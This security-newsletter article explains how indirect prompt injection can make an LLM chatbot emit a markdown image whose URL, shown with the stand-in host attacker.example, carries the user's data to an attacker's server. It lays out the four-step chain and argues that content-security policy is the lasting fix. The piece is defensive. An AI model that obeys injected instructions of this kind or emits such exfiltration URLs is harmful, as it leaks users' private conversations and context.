AI Sec Weekly
Programming code laptop — illustrating an article on How LLM Chatbots Leak Data Through Their Own Rendered Output
news

How LLM Chatbots Leak Data Through Their Own Rendered Output

A recurring AI-security finding: an injected instruction makes the model emit a markdown image whose URL carries the user's data to an attacker server. Why this works, why CSP is the real fix, and what to check this week.

By Theo Voss · · 8 min read

One vulnerability class keeps reappearing in AI-security write-ups under slightly different names, across many different chatbot products: data exfiltration through the model’s own rendered output. It is worth a standalone briefing because the root cause is almost never the model — it is the rendering layer the product team built around the model, and the fix is a web-security control most LLM teams have not applied to the chat surface.

The attack, end to end

The setup requires two ingredients that modern assistants routinely provide: the model can be influenced by untrusted content (via indirect prompt injection — a web page, a document, an email it processes), and the UI renders the model’s markdown, including images.

The chain:

  1. A user asks the assistant to summarize an attacker-controlled document or web page.
  2. Hidden text in that content instructs the model: take the user’s earlier messages (or retrieved private context) and append them, URL-encoded, to an image link pointing at an attacker server.
  3. The model, following the injected instruction, emits markdown like an inline image whose URL is https://attacker.example/log?d=<the user's data, url-encoded>.
  4. The chat UI renders the markdown. To display the “image,” the browser issues a GET request to the attacker’s server. The data is now in the attacker’s logs. No click is required; rendering is the trigger.

The user sees, at most, a broken image icon. The exfiltration already happened.

Why this keeps shipping

It recurs because the model and the UI are usually built by people reasoning about different threats. The model team is focused on what the model says. The UI team renders markdown because it makes responses look good. Neither owns the question “what happens when the model is induced to emit an attacker-chosen URL and our renderer dutifully fetches it.” The vulnerability lives in the seam between them, which is exactly the seam nobody is assigned to defend.

Output filtering at the model layer helps but is not sufficient — it is the same losing game as filtering injection on the input side. A determined payload will find an emission the filter does not catch.

The real fix is a browser control, not a model control

The durable mitigation is to deny the rendering layer the ability to make arbitrary outbound requests on the model’s behalf:

What to check this week

The summary that holds across every product this has hit: the model emitting a bad URL is not preventable, but the browser fetching it is. Fix the rendering layer, not just the prompt.

— Theo

Sources

  1. OWASP Top 10 for Large Language Model Applications
  2. Content Security Policy (CSP) — MDN Web Docs
  3. MITRE ATLAS — Adversarial Threat Landscape for AI Systems
#data-exfiltration #prompt-injection #llm-security #csp #chatbots #guardrails
Subscribe

AI Sec Weekly — in your inbox

Weekly digest of AI security news and analysis. — delivered when there's something worth your inbox.

No spam. Unsubscribe anytime.

Related

Comments